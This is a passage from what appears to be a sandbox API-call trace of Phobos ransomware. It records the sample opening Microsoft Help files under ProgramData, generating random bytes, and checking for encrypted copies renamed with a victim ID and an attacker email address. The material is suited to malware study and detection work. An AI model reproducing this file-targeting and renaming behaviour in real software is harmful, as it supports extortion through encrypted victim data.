hTemplateFile=0x0) returned 0xffffffff [0123.264] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.264] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.264] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=350) returned 1 [0123.264] CloseHandle (hObject=0x2b8) returned 1 [0123.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn")) returned 0x2022 [0123.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.264] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.265] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.265] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.265] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=326) returned 1 [0123.265] CloseHandle (hObject=0x2b8) returned 1 [0123.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn")) returned 0x2022 [0123.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.266] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.266] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.266] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.268] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=332) returned 1 [0123.268] CloseHandle (hObject=0x2b8) returned 1 [0123.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn")) returned 0x2022 [0123.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.268] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.268] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.268] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.269] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=344) returned 1 [0123.269] CloseHandle (hObject=0x2b8) returned 1 [0123.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn")) returned 0x2022 [0123.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.270] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.270] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.270] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=380) returned 1 [0123.270] CloseHandle (hObject=0x2b8) returned 1 [0123.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn")) returned 0x2022 [0123.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.270] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.270] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.271] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.271] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=344) returned 1 [0123.271] CloseHandle (hObject=0x2b8) returned 1 [0123.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn")) returned 0x2022 [0123.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.272] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.272] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.272] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.272] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=368) returned 1 [0123.272] CloseHandle (hObject=0x2b8) returned 1 [0123.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn")) returned 0x2022 [0123.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.272] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.272] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.273] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.274] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=326) returned 1 [0123.274] CloseHandle (hObject=0x2b8) returned 1 [0123.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn")) returned 0x2022 [0123.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.274] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.274] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.274] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.275] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=326) returned 1 [0123.275] CloseHandle (hObject=0x2b8) returned 1 [0123.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn")) returned 0x2022 [0123.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.275] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.275] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.276] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=350) returned 1 [0123.276] CloseHandle (hObject=0x2b8) returned 1 [0123.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn")) returned 0x2022 [0123.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.276] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.276] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=332) returned 1 [0123.277] CloseHandle (hObject=0x2b8) returned 1 [0123.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn")) returned 0x2022 [0123.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.277] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.277] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.277] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.277] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=314) returned 1 [0123.277] CloseHandle (hObject=0x2b8) returned 1 [0123.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn")) returned 0x2022 [0123.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.277] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.278] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.278] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.280] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=338) returned 1 [0123.280] CloseHandle (hObject=0x2b8) returned 1 [0123.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn")) returned 0x2022 [0123.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.280] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.281] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.281] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.282] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=338) returned 1 [0123.282] CloseHandle (hObject=0x2b8) returned 1 [0123.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn")) returned 0x2022 [0123.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.286] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.286] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.286] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.286] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=362) returned 1 [0123.286] CloseHandle (hObject=0x2b8) returned 1 [0123.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn")) returned 0x2022 [0123.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.287] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.287] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.287] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.288] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=344) returned 1 [0123.288] CloseHandle (hObject=0x2b8) returned 1 [0123.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn")) returned 0x2022 [0123.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.288] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.329] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=368) returned 1 [0123.329] CloseHandle (hObject=0x2b8) returned 1 [0123.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn")) returned 0x2022 [0123.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.329] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.329] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.329] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 